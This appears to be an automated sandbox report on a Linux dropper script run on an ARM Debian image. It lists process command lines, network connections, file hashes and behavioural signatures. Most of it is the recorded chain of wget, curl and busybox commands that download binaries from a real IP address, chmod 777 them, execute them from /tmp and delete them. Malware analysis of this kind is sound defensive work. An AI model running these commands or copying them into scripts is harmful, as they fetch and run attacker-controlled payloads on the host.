[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/rm
[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/wget
[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/chmod
[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY
[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/rm
[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/wget
[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/chmod
[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W
[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/rm
[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/wget
[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/chmod
[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1
[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/rm
[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/wget
[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/chmod
[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv
[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/rm
[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/wget
[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/chmod
[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa
[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/rm
[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/wget
[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/chmod
[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW
[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/rm
[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/wget
[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/chmod
[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE
[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/rm
[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/wget
[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/chmod
[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD
[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/rm
[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/wget
[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/chmod
[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65
[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/rm
[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/wget
[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/chmod
[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj
[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/rm
[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/wget
[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/chmod
[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs
[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/rm
[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/wget
[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/chmod
[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv
[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/rm
[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/wget
[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/chmod
[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa
[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/rm
[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/wget
[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/chmod
[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW
[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/rm
[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/wget
[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/chmod
[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj
[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/rm
[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/wget
[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/chmod
[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs
[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/rm
[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/wget
[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/chmod
[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE
[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/rm
[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/wget
[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/chmod
[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD
[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/rm
[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/wget
[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/chmod
[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65
[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/rm
[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/wget
[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/chmod
[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/rm
[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/wget
[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/chmod
[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4
[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/rm
[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/wget
[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/chmod
[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5
[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/rm
[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/wget
[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/chmod
[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY
[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/rm
[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/wget
[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/chmod
[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W
[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/rm
[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/wget
[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/chmod
[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1
[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/rm
[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 01:33
Reported
2024-11-14 01:36
Platform
debian9-armhf-20240418-en
Max time kernel
18s
Max time network
19s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | N/A |
| N/A | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | N/A |
| N/A | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | N/A |
| N/A | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | N/A |
| N/A | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | N/A |
| N/A | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | N/A |
| N/A | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | N/A |
| N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /usr/bin/curl | N/A |
Processes
/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh
[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/busybox
